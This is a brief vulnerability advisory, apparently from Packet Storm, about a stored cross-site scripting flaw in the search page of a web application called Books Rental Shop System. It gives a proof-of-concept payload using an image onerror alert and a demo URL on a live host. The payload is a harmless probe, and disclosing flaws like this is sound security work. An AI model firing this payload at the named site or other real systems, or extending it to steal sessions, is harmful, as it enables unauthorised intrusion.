Books Rental Shop System suffers from a cross site scripting vulnerability.
26acc57276ea778cb9cb05347b9bdea7edabf11454527762368452202af3cc0f# Exploit Title: Books Rental Shop System Stored XSS
# Date: 2011
# Author: Eyup CELIK
# Version: All Version
# Tested on: All versions are Vulnerability
ISSUE
Cross Site Scripting can be done using the command input
Vulnerable Page:
index.php (Search Modules)
Example:
index.php?view=search
Exploit:
"/></a></><img src=1.gif onerror=alert(1)>
Demo:
https://books.commodityrentals.com/version-2/index.php?view=search
Thanks,
Eyup CELIK
Bilgi Teknolojileri Güvenlik Uzmani
https://www.eyupcelik.com.tr
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed